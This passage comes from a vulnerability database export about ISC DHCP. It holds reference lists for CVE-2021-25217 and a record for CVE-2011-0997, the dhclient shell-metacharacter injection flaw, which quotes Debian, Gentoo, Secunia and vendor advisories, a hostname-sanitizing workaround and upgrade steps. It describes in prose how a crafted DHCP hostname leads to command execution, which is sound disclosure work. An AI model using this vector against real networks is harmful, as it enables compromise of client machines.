        "url": "https://access.redhat.com/security/cve/cve-2021-3560"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20271"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3326"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-2708"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8927"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29363"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-10228"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8284"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33910"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-27618"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989157"
      },
      {
        "trust": 0.1,
        "url": "https://alas.aws.amazon.com/alas-2021-1510.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14347"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14346"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25712"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23240"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12364"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9951"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23239"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36242"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9948"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13012"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28935"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26116"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14345"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13584"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14360"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13584"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20201"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25659"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3119"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25215"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9983"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14344"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14345"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14344"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23336"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14361"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28211"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13012"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14346"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12364"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20454"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20305"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29418"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13050"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33034"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27618"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28092"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20843"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28851"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-1730"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29482"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23337"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27358"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23369"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21321"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23364"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23343"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3449"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21309"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33502"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23383"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28918"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28851"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1000858"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14889"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1730"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13627"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3016"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3377"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3450"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21272"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29477"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27292"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23346"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29478"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23839"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19906"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33623"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21322"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23382"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15903"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29361"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2420"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2414"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2416"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2357"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-25217"
      },
      {
        "db": "PACKETSTORM",
        "id": "163789"
      },
      {
        "db": "PACKETSTORM",
        "id": "163747"
      },
      {
        "db": "PACKETSTORM",
        "id": "163196"
      },
      {
        "db": "PACKETSTORM",
        "id": "163155"
      },
      {
        "db": "PACKETSTORM",
        "id": "163144"
      },
      {
        "db": "PACKETSTORM",
        "id": "163145"
      },
      {
        "db": "PACKETSTORM",
        "id": "163051"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-1759"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25217"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-25217",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163789",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163747",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163196",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163155",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163144",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163145",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163051",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-1759",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25217",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2021-05-26T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-25217",
        "ident": null
      },
      {
        "date": "2021-08-11T16:15:17",
        "db": "PACKETSTORM",
        "id": "163789",
        "ident": null
      },
      {
        "date": "2021-08-06T14:02:37",
        "db": "PACKETSTORM",
        "id": "163747",
        "ident": null
      },
      {
        "date": "2021-06-17T18:09:00",
        "db": "PACKETSTORM",
        "id": "163196",
        "ident": null
      },
      {
        "date": "2021-06-15T15:18:36",
        "db": "PACKETSTORM",
        "id": "163155",
        "ident": null
      },
      {
        "date": "2021-06-15T14:50:28",
        "db": "PACKETSTORM",
        "id": "163144",
        "ident": null
      },
      {
        "date": "2021-06-15T14:51:01",
        "db": "PACKETSTORM",
        "id": "163145",
        "ident": null
      },
      {
        "date": "2021-06-09T13:43:37",
        "db": "PACKETSTORM",
        "id": "163051",
        "ident": null
      },
      {
        "date": "2021-05-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-1759",
        "ident": null
      },
      {
        "date": "2021-06-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-001741",
        "ident": null
      },
      {
        "date": "2021-05-26T22:15:07.947000",
        "db": "NVD",
        "id": "CVE-2021-25217",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-25217",
        "ident": null
      },
      {
        "date": "2023-05-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-1759",
        "ident": null
      },
      {
        "date": "2022-09-20T06:10:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-001741",
        "ident": null
      },
      {
        "date": "2023-11-07T03:31:24.893000",
        "db": "NVD",
        "id": "CVE-2021-25217",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote or local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-1759"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "_id": null,
    "data": "ISC\u00a0DHCP\u00a0 buffer overflow vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-1759"
      }
    ],
    "trust": 0.6
  }
}

VAR-201104-0082

Vulnerability from variot - Updated: 2026-03-09 22:43

dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message, as demonstrated by a hostname that is provided to dhclient-script. The ISC dhclient contains a vulnerability that could allow a remote attacker to execute arbitrary code on the client machine. Apple has released a firmware update for Apple Time Capsule and AirPort Base Station (802.11n). Any command may be executed by processing a crafted DHCP response. Depending on the script and OS, this can result in execution of exploit code on the client.

CVSS Score: 6.8 (AV:A/AC:L/Au:N/C:P/I:N/A:C)

For more information on CVSS scores, visit http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

Workarounds:

On SUSE systems, it is possible to disable hostname update by setting DHCLIENT_SET_HOSTNAME="no" in /etc/sysconfig/network/dhcp.

Other systems may add the following line to dhclient-script at the beginning of the set_hostname() function:

new_host_name=${new_host_name//[^-.a-zA-Z0-9]/}

In environments where filters/acls can be put into place to limit clients to accessing only legitimate dhcp servers, this will protect clients from rogue dhcp servers deliberately trying to exploit this bug. However, this will not protect from compromised servers.
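The allow-list filter from the workaround above, as an added example that is not part of the advisory or of dhclient-script. It uses tr so that it also runs under a plain POSIX sh; the function names, the extra validity checks and the sample values are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: allow-list filtering of a DHCP-supplied hostname before a
# client script uses it. Not taken from dhclient-script.

# Keep only letters, digits, '.' and '-': the same character set as the
# advisory's new_host_name=${new_host_name//[^-.a-zA-Z0-9]/} line.
sanitize_hostname() {
    printf '%s' "$1" | LC_ALL=C tr -cd 'a-zA-Z0-9.-'
}

# Hypothetical extra checks on the filtered value. The one-line workaround
# removes metacharacters but still lets through an empty string or a value
# that starts with '-', which a later command could read as an option.
valid_hostname() {
    name=$1
    [ -n "$name" ] || return 1              # nothing left after filtering
    [ "${#name}" -le 253 ] || return 1      # longer than a DNS name may be
    case $name in
        -*|.*|*..*) return 1 ;;             # option-like, or an empty label
    esac
    return 0
}

# Print the filtered hostname and return 0, or print nothing and return 1.
pick_hostname() {
    cleaned=$(sanitize_hostname "$1")
    if valid_hostname "$cleaned"; then
        printf '%s\n' "$cleaned"
    else
        return 1
    fi
}

# Constructed sample values, standing in for what a server might send.
for sample in 'web01.example.net' 'host;echo injected' \
              '$(echo injected).lan' '-s' ';|&'; do
    if out=$(pick_hostname "$sample"); then
        printf 'accepted as: %s\n' "$out"
    else
        printf 'rejected:    %s\n' "$sample"
    fi
done
```

Filtering of this kind only covers the hostname value; the fixed releases named in the advisory remain the actual remedy.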

Active exploits:

None known at this time. https://www.isc.org/downloads/all

No patch is available for 4.0.x as it is EOL. Anyone running 4.1.x should upgrade to 4.1-ESV-R2.


Debian Security Advisory DSA-2216-1
security@debian.org
http://www.debian.org/security/
Nico Golde
April 10, 2011
http://www.debian.org/security/faq

Package        : isc-dhcp
Vulnerability  : missing input sanitization
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-0997
Debian bug     : 621099

Sebastian Krahmer and Marius Tomaschewski discovered that dhclient of isc-dhcp, a DHCP client, is not properly filtering shell meta-characters in certain options in DHCP server responses. These options are reused in an insecure fashion by dhclient scripts.

For the oldstable distribution (lenny), this problem has been fixed in an additional update for dhcp3.

For the stable distribution (squeeze), this problem has been fixed in version 4.1.1-P1-15+squeeze2.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in version 4.1.1-P1-16.1.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org


Gentoo Linux Security Advisory GLSA 201301-06

http://security.gentoo.org/

Severity: Normal
Title: ISC DHCP: Denial of Service
Date: January 09, 2013
Bugs: #362453, #378799, #393617, #398763, #428120, #434880
ID: 201301-06


Synopsis

Multiple vulnerabilities have been found in ISC DHCP, the worst of which may allow remote Denial of Service.

Background

ISC DHCP is a Dynamic Host Configuration Protocol (DHCP) client/server.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------
  1  net-misc/dhcp           < 4.2.4_p2                >= 4.2.4_p2

Description

Multiple vulnerabilities have been discovered in ISC DHCP. Please review the CVE identifiers referenced below for details.

Resolution

All ISC DHCP users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-misc/dhcp-4.2.4_p2"

References

[ 1 ] CVE-2011-0997 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0997
[ 2 ] CVE-2011-2748 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2748
[ 3 ] CVE-2011-2749 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2749
[ 4 ] CVE-2011-4539 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4539
[ 5 ] CVE-2011-4868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4868
[ 6 ] CVE-2012-3570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3570
[ 7 ] CVE-2012-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3571
[ 8 ] CVE-2012-3954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3954
[ 9 ] CVE-2012-3955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3955

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-201301-06.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

This issue is addressed by stripping shell meta-characters in dhclient-script.

It is recommended that AirPort Utility 5.5.3 or later be installed before upgrading to Firmware version 7.6.

TITLE: ISC DHCP "dhclient" Response Processing Input Sanitation Vulnerability

SECUNIA ADVISORY ID: SA44037

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44037/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44037

RELEASE DATE: 2011-04-07

DESCRIPTION: A vulnerability has been reported in ISC DHCP, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to certain shell meta-characters not being stripped or escaped when processing responses from a DHCP server. This can be exploited to submit shell commands to the "dhclient-script" script via e.g. a specially crafted "hostname" response.

The vulnerability is reported in versions 3.0.x through 4.2.x.

SOLUTION: Update to version 3.1-ESV-R1 and 4.1-ESV-R2 or 4.2.1-P1.

PROVIDED AND/OR DISCOVERED BY: The vendor credits Sebastian Krahmer and Marius Tomaschewski, SUSE Security Team.

ORIGINAL ADVISORY: https://www.isc.org/software/dhcp/advisories/cve-2011-0997

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "isc",
        "version": "4.2.0"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "isc",
        "version": "4.1-esv"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "isc",
        "version": "4.2.1"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "10.04"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.0.2"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.0.6"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.0.1"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "6.06"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.0.3"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.1.3"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "9.10"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.1.2"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "10.10"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.0.5"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.1.0"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "8.04"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.1.1"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.1-esv"
      },
      {
        "_id": null,
        "model": "dhcp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "isc",
        "version": "3.0.4"
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "debian gnu linux",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "internet consortium",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "mandriva s a",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
